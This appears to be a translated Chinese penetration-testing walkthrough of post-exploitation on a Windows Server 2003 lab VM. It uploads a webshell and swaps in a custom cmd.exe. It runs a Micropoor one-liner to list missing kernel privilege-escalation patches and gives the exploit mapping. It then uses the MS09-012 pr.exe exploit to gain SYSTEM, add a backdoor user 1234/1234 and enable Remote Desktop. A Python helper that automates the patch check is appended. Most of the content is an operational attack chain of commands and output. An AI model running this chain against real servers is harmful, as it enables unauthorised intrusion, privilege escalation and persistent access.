## 1. Workflow

First, upload a one-line webshell (一句話木馬).

## 2. Access the webshell to get a terminal and a file manager

![image](https://hackmd.io/_uploads/rJSqll_LC.png)

## 3. Anywhere you can upload a webshell, you effectively have read and write access

Use that to upload a `cmd.exe` of your own (one with full permissions).

![image](https://hackmd.io/_uploads/ry0pll_LA.png)

## 4. Use the uploaded cmd.exe

```
setp [absolute path of the uploaded cmd.exe]
```

This makes the `cmd.exe` you are allowed to run the default command interpreter for the 菜刀 (China Chopper) terminal. It is needed when the system's own `cmd.exe` is locked down for the web server's account.

## 5. Vulnerability scan (patch level)

```
systeminfo
```

Note: if the `systeminfo` command is not usable, the most likely cause is that the target's `systeminfo.exe` has too few permissions for the web account or is damaged. Upload a `systeminfo.exe` through 菜刀 as well and call it by its absolute path. (`wmic qfe get hotfixid` reads the same hotfix list through WMI and is a useful cross-check.)

### Terminal output

The target is a Simplified-Chinese build, so the labels are left as captured:

```
C:\www.test\XYCMS\> systeminfo
主机名:           OLDBOY-BFF81D0F
OS 名称:          Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS 版本:          5.2.3790 Service Pack 2 Build 3790
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     lin
注册的组织:       oldboy
产品 ID:          69813-640-9722366-45998
初始安装日期:     2023-8-9, 20:24:50
系统启动时间:     0 天 0 小时 5 分 25 秒
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         X86-based PC
处理器:           安装了 2 个处理器。
                  [01]: x86 Family 6 Model 141 Stepping 1 GenuineIntel ~2688 Mhz
                  [02]: x86 Family 6 Model 141 Stepping 1 GenuineIntel ~2688 Mhz
BIOS 版本:        INTEL  - 6040000
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   1,576 MB
页面文件: 最大值: 3,944 MB
页面文件: 可用:   3,510 MB
页面文件: 使用中: 434 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 7 个修补程序。
                  [01]: File 1
                  [02]: File 1
                  [03]: File 1
                  [04]: Q147222
                  [05]: KB926140-v5
                  [06]: KB942288-v4 - Update
                  [07]: KB954550-v5
网卡:             暂缺
```

### Checking the patch level

The command broken down below (Micropoor's kernel-exploit check) is a one-line cmd.exe script. It checks whether specific Windows updates (KB numbers) are installed on the current system and prints the ones that are missing. It is typed straight into the terminal, which is why the loop variable is written `%i`; if you save it as a `.bat` file instead, cmd.exe requires `%%i`. Piece by piece:

### 1. `systeminfo>micropoor.txt`

Writes the system information to a file named `micropoor.txt`. `systeminfo` reports detailed configuration data, including the installed hotfixes.

### 2. `&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)`

A `for` loop that walks the list of KB numbers and checks whether each one appears in `micropoor.txt`.

- `for %i in (...) 
do`: iterate over every KB number inside the parentheses.
- `@type micropoor.txt`: print the contents of `micropoor.txt`.
- `| @find /i "%i"`: pipe that output into `find`, which searches for the current KB number (case-insensitive).
- `|| @echo %i you can fuck`: if `find` finds no match (non-zero exit code), `echo` prints the KB number followed by an abusive phrase ("you can fuck").

### 3. `&del /f /q /a micropoor.txt`

Deletes `micropoor.txt`.

- `del`: delete the file.
- `/f`: force-delete read-only files.
- `/q`: quiet mode, no confirmation prompt.
- `/a`: select files regardless of attributes (hidden and system files included).

### Putting it together

The script saves the system information to `micropoor.txt`, then checks whether each listed KB patch is installed. For every patch that is not installed it prints the KB number plus the abusive phrase, and finally deletes `micropoor.txt` to clean up the temporary file.

Two caveats. "Missing" here only means "not in the hotfix list that `systeminfo` prints"; a fix can also have arrived under a different KB number in a later cumulative update, so confirm the file version of the affected driver before relying on an exploit. And a KB can only be present on a system it was ever released for: Windows Server 2003 left support in July 2015, so the later entries in this list (MS15-097 and the 2016 bulletins) will always show as missing on this target and say nothing about it.

### Example

If `KB2160329` is not installed, the script prints:

```
KB2160329 you can fuck
```

### Suggested change

Because the output contains offensive language, change it to a friendlier message, for example:

```batch
systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i is missing)&del /f /q /a micropoor.txt
```

### Terminal

```terminal
C:\www.test\XYCMS\> systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i is missing)&del /f /q /a micropoor.txt
KB977165 is missing
KB2160329 is missing
KB2503665 is missing
KB2592799 is missing
KB2707511 is missing
KB2829361 is missing
KB2850851 is missing
KB3000061 is missing
KB3045171 is missing
KB3077657 is missing
KB3079904 is missing
KB3134228 is missing
KB3143141 is missing
KB3141780 is missing
```

### What these KBs fix

Asking GPT for this (as the original step did) gives descriptions that are mostly wrong: it labelled several of them as Internet Explorer, DirectShow or ASP.NET fixes. This is Micropoor's list of kernel privilege-escalation patches, and the bulletin numbers are the reliable reference:

```
KB977165  - MS10-015  Windows kernel (KiTrap0D), elevation of privilege
KB2160329 - MS10-048  win32k.sys, elevation of privilege
KB2503665 - MS11-046  afd.sys, elevation of privilege
KB2592799 - MS11-080  afd.sys, elevation of privilege
KB2707511 - MS12-042  Windows kernel, elevation of privilege
KB2829361 - MS13-046  kernel-mode drivers, elevation of privilege
KB2850851 - MS13-053  win32k.sys, elevation of privilege
KB3000061 - MS14-058  win32k.sys, elevation of privilege (CVE-2014-4113)
KB3045171 - MS15-051  win32k.sys, elevation of privilege
KB3077657 - MS15-077  ATMFD.dll font driver, elevation of privilege
KB3079904 - MS15-097  graphics component, remote code execution
KB3134228 - MS16-016  WebDAV, elevation of privilege
KB3143141 - MS16-032  Secondary Logon, elevation of privilege
KB3141780 - MS16-034  kernel-mode drivers, elevation of privilege
```

## 6. Exploitation

The dictionary above is short; here is a larger one. This version uses `findstr /i /c:"%i" micropoor.txt > nul` instead of `type | find`: `/c:` matches the literal string, and sending the output to `nul` keeps matched lines from being echoed, so the only output is the missing list.

```terminal
C:\www.test\XYCMS\> systeminfo > micropoor.txt & (for %i in (KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 KB885835 KB896424 KB893066 KB890830 KB873333 KB891781 KB873339 KB885836 KB888113 KB890046 KB891861 KB893086 KB896358 KB899587 KB899588 KB900725 KB901214 KB902400 KB904706 KB905414 KB905749 KB908519 KB908531 KB910437 KB911562 KB911927 KB912919 KB913580 KB914388 KB915800 KB916281 KB917344 KB918118 KB918439 KB918899 KB919007 KB920213 KB920342 KB920670 KB920683 KB920685 KB922582 KB922819 KB923191 KB923414 KB923980 KB924270 KB924667 KB925398 KB925902 KB926122 KB926255 KB926436 KB927436 KB928843 KB928255 KB929123 KB930178 KB930916 KB931784 KB932168 KB932590 KB933566 KB935839 KB936021 KB936782 KB937143 KB938127 KB938464 KB939373 KB940541 KB941569 KB941644 KB942830 KB943055 KB943460 KB944338 KB944653 KB945553 KB946648 KB948496 KB950762 KB950974 KB951066 KB951748 KB952004 KB952954 KB953155 KB953298 KB953761 KB954155 KB954459 KB955069 KB955839 KB956803 KB957095 KB957097 KB958644 KB959426 KB959454 KB960225 KB960803 KB961501 KB961729 KB963093 KB967715 KB968389 KB968537 KB968585 KB969604 KB970430 KB971468 KB971657 KB971961 KB973507 KB973869 KB973904 KB974112 KB974318 KB974392 KB974571 KB975025 KB975467 KB975560 KB975713 KB976098 KB976323 KB976662 KB976749 KB977914 KB978037 KB978338 KB978542 KB978601 KB978695 KB978835 KB979309 KB979683 KB980232 KB981957 KB982316) do @findstr /i /c:"%i" micropoor.txt > nul || @echo %i is missing) & del /f /q micropoor.txt
KB977165 is missing
KB2160329 is missing
KB2503665 is missing
KB2592799 is missing
KB2707511 is missing
KB2829361 is missing
KB2850851 is missing
KB3000061 is missing
KB3045171 is missing
KB3077657 is missing
KB3079904 is missing
KB3134228 is missing
KB3143141 is missing
KB3141780 is missing
KB885835 is missing
KB896424 is missing
KB893066 is missing
KB890830 is missing
KB873333 is missing
KB891781 is missing
KB873339 is missing
KB885836 is missing
KB888113 is missing
KB890046 is missing
KB891861 is missing
KB893086 is missing
KB896358 is missing
KB899587 is missing
KB899588 is missing
KB900725 is missing
KB901214 is missing
KB902400 is missing
KB904706 is missing
KB905414 is missing
KB905749 is missing
KB908519 is missing
KB908531 is missing
KB910437 is missing
KB911562 is missing
KB911927 is missing
KB912919 is missing
KB913580 is missing
KB914388 is missing
KB915800 is missing
KB916281 is missing
KB917344 is missing
KB918118 is missing
KB918439 is missing
KB918899 is missing
KB919007 is missing
KB920213 is missing
KB920342 is missing
KB920670 is missing
KB920683 is missing
KB920685 is missing
KB922582 is missing
KB922819 is missing
KB923191 is missing
KB923414 is missing
KB923980 is missing
KB924270 is missing
KB924667 is missing
KB925398 is missing
KB925902 is missing
KB926122 is missing
KB926255 is missing
KB926436 is missing
KB927436 is missing
KB928843 is missing
KB928255 is missing
KB929123 is missing
KB930178 is missing
KB930916 is missing
KB931784 is missing
KB932168 is missing
KB932590 is missing
KB933566 is missing
KB935839 is missing
KB936021 is missing
KB936782 is missing
KB937143 is missing
KB938127 is missing
KB938464 is missing
KB939373 is missing
KB940541 is missing
KB941569 is missing
KB941644 is missing
KB942830 is missing
KB943055 is missing
KB943460 is missing
KB944338 is missing
KB944653 is missing
KB945553 is missing
KB946648 is missing
KB948496 is missing
KB950762 is missing
KB950974 is missing
KB951066 is missing
KB951748 is missing
KB952004 is missing
KB952954 is missing
KB953155 is missing
KB953298 is missing
KB953761 is missing
KB954155 is missing
KB954459 is missing
KB955069 is missing
KB955839 is missing
KB956803 is missing
KB957095 is missing
KB957097 is missing
KB958644 is missing
KB959426 is missing
KB959454 is missing    //MS09-012
KB960225 is missing
KB960803 is missing
KB961501 is missing
KB961729 is missing
KB963093 is missing
KB967715 is missing
KB968389 is missing
KB968537 is missing
KB968585 is missing
KB969604 is missing
KB970430 is missing
KB971468 is missing
KB971657 is missing
KB971961 is missing
KB973507 is missing
KB973869 is missing
KB973904 is missing
KB974112 is missing
KB974318 is missing
KB974392 is missing
KB974571 is missing
KB975025 is missing
KB975467 is missing
KB975560 is missing
KB975713 is missing
KB976098 is missing
KB976323 is missing
KB976662 is missing
KB976749 is missing
KB977914 is missing
KB978037 is missing
KB978338 is missing
KB978542 is missing
KB978601 is missing
KB978695 is missing
KB978835 is missing
KB979309 is missing
KB979683 is missing
KB980232 is missing
KB981957 is missing
KB982316 is missing
```

## Worked example: MS09-012 [KB959454]

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS09-012 has a toolkit for exploiting this one. Read its readme.md for the usage.

![image](https://hackmd.io/_uploads/ByRPD0DUC.png)

Upload pr.exe and use the syntax it gives. MS09-012 is the token-kidnapping bug in Windows Service Isolation, so pr.exe runs the quoted command with SYSTEM privileges; run it through the cmd.exe set with `setp` in step 4 and give it absolute paths, since the webshell's working directory is the web root.

### Check where we are

![image](https://hackmd.io/_uploads/Skb5iADIA.png)

### Add user 1234 / 1234

![image](https://hackmd.io/_uploads/SkVpoAwUR.png)

### View user 1234's details

![image](https://hackmd.io/_uploads/B1oAoCvIA.png)

### Use pr1.exe to run 3389.exe and enable Remote Desktop

What 3389.exe does under the hood is clear the `fDenyTSConnections` value under `HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server`, which is the switch that Terminal Services checks on Server 2003; if the helper is not at hand, setting that value to 0 as SYSTEM has the same effect.

![image](https://hackmd.io/_uploads/r1oxnCD8A.png)

Done!!!

Silently chanting "505 is handsome" earns you good karma.
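The check in steps 5 and 6 can also be done offline against a saved `systeminfo` capture, which avoids re-running it through the webshell for every new KB list and keeps the KB-to-bulletin mapping next to the result. The script below is an added example, not code from the original page, from Micropoor or from the SecWiki toolkit: the function names are mine, `SAMPLE_SYSTEMINFO` is a constructed, abridged copy of the step-5 output, `KB_BULLETINS` is limited to the step-5 list plus KB959454, and `cmd_oneliner` generalises the step-6 one-liner to any KB list (including the `%%i` form needed inside a `.bat` file).

```python
# Offline patch check (added example; not from the page, Micropoor, or SecWiki).
# Parses saved `systeminfo` output, diffs the hotfix list against the step-5
# kernel-EoP KB list, and builds the step-6 cmd.exe one-liner for any KB list.
import re

# KB -> bulletin, from Microsoft's published security bulletins. Limited to the
# step-5 list plus the MS09-012 KB used later on the page (an assumption of scope).
KB_BULLETINS = {
    "KB977165": "MS10-015 Windows kernel (KiTrap0D), elevation of privilege",
    "KB2160329": "MS10-048 win32k.sys, elevation of privilege",
    "KB2503665": "MS11-046 afd.sys, elevation of privilege",
    "KB2592799": "MS11-080 afd.sys, elevation of privilege",
    "KB2707511": "MS12-042 Windows kernel, elevation of privilege",
    "KB2829361": "MS13-046 kernel-mode drivers, elevation of privilege",
    "KB2850851": "MS13-053 win32k.sys, elevation of privilege",
    "KB3000061": "MS14-058 win32k.sys, elevation of privilege (CVE-2014-4113)",
    "KB3045171": "MS15-051 win32k.sys, elevation of privilege",
    "KB3077657": "MS15-077 ATMFD.dll font driver, elevation of privilege",
    "KB3079904": "MS15-097 graphics component, remote code execution",
    "KB3134228": "MS16-016 WebDAV, elevation of privilege",
    "KB3143141": "MS16-032 Secondary Logon, elevation of privilege",
    "KB3141780": "MS16-034 kernel-mode drivers, elevation of privilege",
    "KB959454": "MS09-012 Windows Service Isolation (token kidnapping), elevation of privilege",
}

# Constructed sample: an abridged copy of the step-5 capture (Simplified-Chinese build).
SAMPLE_SYSTEMINFO = """\
OS 名称:          Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS 版本:          5.2.3790 Service Pack 2 Build 3790
修补程序:         安装了 7 个修补程序。
                  [01]: File 1
                  [02]: File 1
                  [03]: File 1
                  [04]: Q147222
                  [05]: KB926140-v5
                  [06]: KB942288-v4 - Update
                  [07]: KB954550-v5
网卡:             暂缺
"""

# A hotfix id is "KB" or the older "Q" prefix followed by 5-7 digits; the "-vN"
# revision suffix and the "File 1" placeholders seen on Server 2003 are not matched.
KB_TOKEN = re.compile(r"\b(?:KB|Q)\d{5,7}\b", re.IGNORECASE)


def installed_hotfixes(systeminfo_text):
    """Set of hotfix ids found anywhere in the text, upper-cased.

    Matching the id token rather than the localized 'Hotfix(s)' / '修补程序'
    label keeps this working on any language build of Windows.
    """
    return {m.group(0).upper() for m in KB_TOKEN.finditer(systeminfo_text)}


def missing_patches(systeminfo_text, wanted=KB_BULLETINS):
    """(kb, bulletin) pairs for every wanted KB not listed, in `wanted` order."""
    have = installed_hotfixes(systeminfo_text)
    return [(kb, desc) for kb, desc in wanted.items() if kb.upper() not in have]


def cmd_oneliner(kbs, in_batch_file=False):
    """The step-6 check for an arbitrary KB list.

    Typed into the webshell terminal the loop variable is %i; inside a
    .bat/.cmd file cmd.exe requires %%i, which is why the flag exists.
    """
    var = "%%i" if in_batch_file else "%i"
    kb_list = " ".join(kbs)
    return (
        f"systeminfo > micropoor.txt & (for {var} in ({kb_list}) do "
        f'@findstr /i /c:"{var}" micropoor.txt > nul || @echo {var} is missing)'
        " & del /f /q micropoor.txt"
    )


if __name__ == "__main__":
    for kb, desc in missing_patches(SAMPLE_SYSTEMINFO):
        print(f"{kb} is missing -> {desc}")
    print()
    print(cmd_oneliner(KB_BULLETINS))
```

Run it as-is to see the report for the embedded sample; for a live target paste the captured `systeminfo` text into `SAMPLE_SYSTEMINFO` or read it from a file. The report is only a starting point for the reasons given in step 5: a missing KB says nothing about bulletins that were never released for the target's OS, and a later cumulative update can carry the same fix under another number.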